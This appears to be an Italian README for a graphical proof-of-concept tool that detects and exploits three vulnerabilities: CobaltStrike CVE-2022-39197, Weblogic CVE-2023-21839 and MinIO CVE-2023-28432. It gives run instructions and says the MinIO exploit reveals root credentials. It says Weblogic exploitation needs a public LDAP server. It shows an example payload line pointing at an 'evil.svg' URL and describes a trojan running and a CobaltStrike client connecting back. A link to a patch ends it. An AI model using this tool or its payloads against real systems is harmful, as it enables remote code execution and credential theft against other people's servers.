
Uno strumento di testing per CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
Uno strumento di test per CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
Strumento di rilevamento e sfruttamento delle vulnerabilità con interfaccia grafica per queste tre vulnerabilità.
Per eseguire il jar è necessario Java 8.
Pensato per un singolo target, non adatto per scansioni di vulnerabilità su più IP.
Per lo sfruttamento della vulnerabilità Weblogic durante il packaging è necessario includere wlfullclient.jar; va aggiunto manualmente.
java -jar Gui-poc-test.jar
Istruzioni: ci sono due pulsanti, "Rilevamento" e "Sfruttamento". Il tool mostra suggerimenti nell'interfaccia per ciascuna vulnerabilità.
Inserisci il target; non serve specificare la porta, di default è 9000, ma può essere modificata (vedi sorgente GuiDemo.java:line144).
Vengono mostrati MINIO_ROOT_USER e MINIO_ROOT_PASSWORD, ecc.
Inserisci IP del target, porta e indirizzo del server LDAP.
Rilevamento:

Attenzione: per lo sfruttamento è necessario configurare un server LDAP (pubblico).

Esempio di payload:
beacon.exe http://127.0.0.1:4444/evil.svg
Risultato: il trojan viene eseguito su Windows e il client CobaltStrike su Mac si connette.
Contemporaneamente, il client CobaltStrike esegue il contenuto del JAR e apre la calcolatrice.

Su Windows viene registrato l'indirizzo di accesso del CobaltStrike.

Patch per CobaltStrike: https://github.com/burpheart/CVE-2022-39197-patch